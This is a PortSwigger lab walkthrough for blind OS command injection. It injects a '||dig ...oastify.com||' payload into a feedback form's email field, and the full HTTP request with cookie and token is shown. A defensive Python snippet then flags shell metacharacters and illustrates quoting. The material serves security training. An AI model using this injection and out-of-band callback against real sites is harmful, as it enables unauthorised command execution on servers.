PortSwigger: Blind OS command injection with out-of-band interaction
Solution
Open the website: https://0a2e003a04620bc68076266600040064.web-security-academy.net/feedback
Copy the Burp Collaborator address to the clipboard:
9isw0gtb66beax22lduciuv3eukl8c00p.oastify.com
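Create the payload by wrapping a dig lookup of the Collaborator address in || separators (%20 is a URL-encoded space):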
Payload: ||dig%209isw0gtb66beax22lduciuv3eukl8c00p.oastify.com||
Send the feedback form request with the payload appended to the email parameter:
POST /feedback/submit HTTP/2
Host: 0a2c00a104832c5282c147250029002d.web-security-academy.net
Cookie: session=9HVzQ0V6jNiINafozDQn6UL4opfzwZRS
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 147
Origin: https://0a2c00a104832c5282c147250029002d.web-security-academy.net
Referer: https://0a2c00a104832c5282c147250029002d.web-security-academy.net/feedback
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

csrf=CO6xwdcjqIdf16hKUHCmrshAwAY3dcAk&name=Jan&email=test%40wp.pl||dig%209isw0gtb66beax22lduciuv3eukl8c00p.oastify.com||&subject=Temat&message=aass
Solved
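
The same request seen from the server side, as an added example that is not part of the original write-up or of the lab's code: it decodes the form body shown above, flags fields containing shell metacharacters, applies a strict email allow-list, and tokenises a command line (without running it) to show why quoting removes the || operators. The command name send-feedback, the regular expression and all function names are assumptions made for illustration.

```python
import re
import shlex
from urllib.parse import parse_qs

# Form body copied from the request on this page.
BODY = ("csrf=CO6xwdcjqIdf16hKUHCmrshAwAY3dcAk&name=Jan"
        "&email=test%40wp.pl||dig%209isw0gtb66beax22lduciuv3eukl8c00p.oastify.com||"
        "&subject=Temat&message=aass")

# Assumption: a conservative ASCII-only allow-list for email addresses.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+")
# Characters a POSIX shell does not treat as plain text.
SHELL_META = set("|&;`$()<>\\\"'\n\r")


def parse_form(body):
    """Decode an application/x-www-form-urlencoded body into {field: value}."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def flag_fields(form):
    """Return {field: metacharacters found} for fields worth alerting on."""
    hits = {name: sorted(SHELL_META & set(value)) for name, value in form.items()}
    return {name: chars for name, chars in hits.items() if chars}


def is_valid_email(value):
    """Allow-list check: the whole value must match, not just a prefix."""
    return EMAIL_RE.fullmatch(value) is not None


def control_operators(cmdline):
    """Tokenise like a POSIX shell (nothing is executed); return operator tokens."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return [t for t in lexer if t and set(t) <= set(lexer.punctuation_chars)]


if __name__ == "__main__":
    form = parse_form(BODY)
    print("flagged fields:", flag_fields(form))
    print("email passes allow-list:", is_valid_email(form["email"]))
    # Hypothetical server-side command line; "send-feedback" is a placeholder.
    print("concatenated:", control_operators("send-feedback " + form["email"]))
    print("quoted:", control_operators("send-feedback " + shlex.quote(form["email"])))
```

Rejecting the value with the allow-list, or passing it as a separate argv element to a process started without a shell, is preferable to quoting; the quoted case is shown only to make the tokenisation difference visible.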